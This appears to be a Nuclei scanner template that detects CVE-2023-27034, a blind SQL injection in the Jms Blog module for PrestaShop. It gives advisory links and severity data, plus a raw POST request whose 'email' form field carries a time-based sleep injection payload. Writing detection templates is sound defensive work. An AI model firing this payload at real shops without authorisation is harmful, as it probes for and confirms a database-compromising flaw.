id: CVE-2023-27034 info: name: Blind SQL injection vulnerability in Jms Blog author: MaStErChO severity: critical description: | The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034 - https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html - https://github.com/advisories/GHSA-7jr7-v6gv-m656 - https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27034 cwe-id: CWE-89 epss-score: 0.01147 epss-percentile: 0.8326 cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 vendor: joommasters product: jms_blog framework: prestashop tags: cve,cve2023,prestashop,prestashop-module,sqli,intrusive http: - raw: - | @timeout: 12s POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw X-Requested-With: XMLHttpRequest Referer: {{RootURL}} Host: {{Hostname}} Connection: Keep-alive ------------YWJkMTQzNDcw Content-Disposition: form-data; name="comment" 555 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="customer_name" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="email" 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z ------------YWJkMTQzNDcw Content-Disposition: form-data; name="post_id" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="post_id_comment_reply" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="submitComment" submitComment= ------------YWJkMTQzNDcw-- - | GET /modules/jmsblog/config.xml HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - 'duration_1>=6' - 'contains(body_2, "Jms Blog")' condition: and # digest: 4a0a00473045022100fcdc39853d829485a30f337911c8aa6e495083a2fcd03ca9db283b15402194e50220023e1e4a57ac32aa6e7739fe36194e298031509217b85243208bef52897d1af2:922c64590222798bb761d5b6d8e72950